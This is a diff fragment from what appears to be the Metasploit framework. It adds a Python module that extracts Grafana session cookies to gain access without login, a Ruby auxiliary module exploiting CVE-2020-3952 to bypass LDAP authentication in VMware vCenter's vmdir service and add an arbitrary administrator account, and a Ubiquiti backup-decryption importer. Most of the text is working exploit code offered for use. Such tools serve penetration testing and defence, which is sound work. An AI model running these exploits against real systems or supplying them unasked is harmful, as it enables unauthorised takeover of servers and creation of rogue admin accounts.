+                url = "https://" + args['RHOSTS'] + ":" + \
+                    args['RPORT'] + args['TARGETURI'] + "login/"
+            else:
+                url = "https://" + args['RHOSTS'] + ":" + \
+                    args['RPORT'] + args['TARGETURI'] + "/login/"
+        module.log('Targeting URL: ' + url, 'debug')
+        r = requests.get(url=url, cookies=cookies, allow_redirects=False)
+
+    except:
+        module.log("Failed to sending request to host.", "error")
+        return
+
+    if r.status_code == 302:
+        try:
+            grafana_user = re.search(
+                r"grafana_user=.*?;", r.headers['Set-Cookie']).group(0)
+            grafana_remember = re.search(
+                r"grafana_remember=.*?;", r.headers['Set-Cookie']).group(0)
+            grafana_sess = re.search(
+                r"grafana_sess=.*?;", r.headers['Set-Cookie']).group(0)
+
+            module.log(
+                "Set following cookies to get access to the grafana instance.", "good")
+            module.log(grafana_user, "good")
+            module.log(grafana_remember, "good")
+            module.log(grafana_sess, "good")
+        except:
+            module.log("Failed to generate cookies out of request.", "error")
+            return
+    else:
+        module.log("Target is not vulnerable.", "warning")
+        return
+
+
+if __name__ == '__main__':
+    module.run(metadata, run)
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::LDAP
+  include Msf::Exploit::Remote::CheckModule
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Server vmdir Authentication Bypass',
+        'Description' => %q{
+          This module bypasses LDAP authentication in VMware vCenter Server's
+          vmdir service to add an arbitrary administrator user. Version 6.7
+          prior to the 6.7U3f update is vulnerable.
+        },
+        'Author' => [
+          # Discovered by unknown researcher(s)
+          'JJ Lehmann', # Analysis and PoC
+          'Ofri Ziv', # Analysis and PoC
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-3952'],
+          ['URL', 'https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html']
+        ],
+        'DisclosureDate' => '2020-04-09', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          ['Add', 'Description' => 'Add an admin user']
+        ],
+        'DefaultAction' => 'Add',
+        'DefaultOptions' => {
+          'CheckModule' => 'auxiliary/gather/vmware_vcenter_vmdir_ldap'
+        },
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [false, 'Username of admin user to add']),
+      OptString.new('PASSWORD', [false, 'Password of admin user to add'])
+    ])
+
+    register_advanced_options([
+      OptFloat.new('ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0])
+    ])
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def base_dn
+    @base_dn ||= 'dc=vsphere,dc=local'
+  end
+
+  def user_dn
+    "cn=#{username},cn=Users,#{base_dn}"
+  end
+
+  def group_dn
+    "cn=Administrators,cn=Builtin,#{base_dn}"
+  end
+
+  def run
+    unless username && password
+      print_error('Please set the USERNAME and PASSWORD options to proceed')
+      return
+    end
+
+    # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap
+    checkcode = check
+
+    return unless checkcode == Exploit::CheckCode::Vulnerable
+
+    # HACK: We stashed the detected base DN in the CheckCode's reason
+    @base_dn = checkcode.reason
+
+    opts = {
+      host: rhost,
+      port: rport,
+      connect_timeout: datastore['ConnectTimeout']
+    }
+
+    Net::LDAP.open(opts) do |ldap|
+      print_status("Bypassing LDAP auth in vmdir service at #{peer}")
+      auth_bypass(ldap)
+
+      print_status("Adding admin user #{username} with password #{password}")
+
+      unless add_admin(ldap)
+        print_error("Failed to add admin user #{username}")
+      end
+    end
+  rescue Net::LDAP::Error => e
+    print_error("#{e.class}: #{e.message}")
+  end
+
+  # This will always return false, since the creds are invalid
+  def auth_bypass(ldap)
+    ldap.bind(
+      method: :simple,
+      username: Rex::Text.rand_text_alphanumeric(8..42),
+      password: Rex::Text.rand_text_alphanumeric(8..42)
+    )
+  end
+
+  def add_admin(ldap)
+    user_info = {
+      'objectClass' => %w[top person organizationalPerson user],
+      'cn' => username,
+      'sn' => 'vsphere.local',
+      'givenName' => username,
+      'sAMAccountName' => username,
+      'userPrincipalName' => "#{username}@VSPHERE.LOCAL",
+      'uid' => username,
+      'userPassword' => password
+    }
+
+    # Add our new user
+    unless ldap.add(dn: user_dn, attributes: user_info)
+      res = ldap.get_operation_result
+
+      case res.code
+      when Net::LDAP::ResultCodeInsufficientAccessRights
+        print_error('Failed to bypass LDAP auth in vmdir service')
+      when Net::LDAP::ResultCodeEntryAlreadyExists
+        print_error("User #{username} already exists")
+      when Net::LDAP::ResultCodeConstraintViolation
+        print_error("Password #{password} does not meet policy requirements")
+      else
+        print_error("#{res.message}: #{res.error_message}")
+      end
+
+      return false
+    end
+
+    print_good("Added user #{username}, so auth bypass was successful!")
+
+    # Add our user to the admin group
+    unless ldap.add_attribute(group_dn, 'member', user_dn)
+      res = ldap.get_operation_result
+
+      if res.code == Net::LDAP::ResultCodeAttributeOrValueExists
+        print_error("User #{username} is already an admin")
+      else
+        print_error("#{res.message}: #{res.error_message}")
+      end
+
+      return false
+    end
+
+    print_good("Added user #{username} to admin group")
+
+    true
+  end
+
+end
@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zlib'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Ubiquiti
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Ubiquiti Configuration Importer',
+      'Description'   => %q{
+        This module imports an Ubiquiti device configuration.
+        The db file within the .unf backup is the data file for
+        Unifi. This module can take either the db file or .unf.
+        },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['h00die']
+    ))
+
+    register_options(
+      [
+        OptPath.new('CONFIG', [true, 'Path to configuration to import']),
+        Opt::RHOST(),
+        Opt::RPORT(22)
+      ])
+
+  end
+
+  def i_file
+    datastore['CONFIG'].to_s
+  end
+
+  def run
+    unless ::File.exist?(i_file)
+      fail_with Failure::BadConfig, "Unifi config file #{i_file} does not exists!"
+    end
+    # input_file could be a unf (encrypted zip), or the db file contained within.
+    input_file = ::File.open(i_file, "rb")
+    f = input_file.read()
+    input_file.close()
+
+    if f.nil?
+      fail_with Failure::BadConfig, "#{i_file} read at 0 bytes.  Either file is empty or error reading."
+    end
+
+    if i_file.end_with? ".unf"
+      decrypted_data = decrypt_unf(f)
+      if decrypted_data.nil? || decrypted_data.empty?
+        fail_with Failure::Unknown, 'Unable to decrypt'
+      end
+      print_good("File DECRYPTED.  Still needs to be repaired")
+      loot_path = Rex::Quickfile.new("decrypted_zip.zip")
+      loot_path.write(decrypted_data)
+      loot_path.close()
+      # ruby zip can't repair, we can try on command line but its not likely to succeed on all platforms
+      # tested on kali
+      repaired = repair_zip(loot_path.path)
+      if repaired.nil?
+        fail_with Failure::Unknown, "Repair failed on #{loot_path.path}"
+      end
+      loot_path = Rex::Quickfile.new("fixed_zip.zip")
+      loot_path.write(repaired)
+      loot_path.close()
+      print_good("File DECRYPTED and REPAIRED and saved to #{loot_path.path}.")
+      config_db = extract_and_process_db(loot_path.path)
+      if config_db.nil?
+        fail_with Failure::Unknown, 'Unable to locate db.gz config database file'
+      end
+      print_status('Converting BSON to JSON.')
+      unifi_config_db_json = bson_to_json(config_db)
+      if unifi_config_db_json == {}
+        fail_with Failure::Unknown, 'Error in file conversion from BSON to JSON.'
+      end
+      unifi_config_eater(datastore['RHOSTS'],datastore['RPORT'],unifi_config_db_json)
+      print_good('Config import successful')
+    end
+  end
+end
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .6.5
 .6.6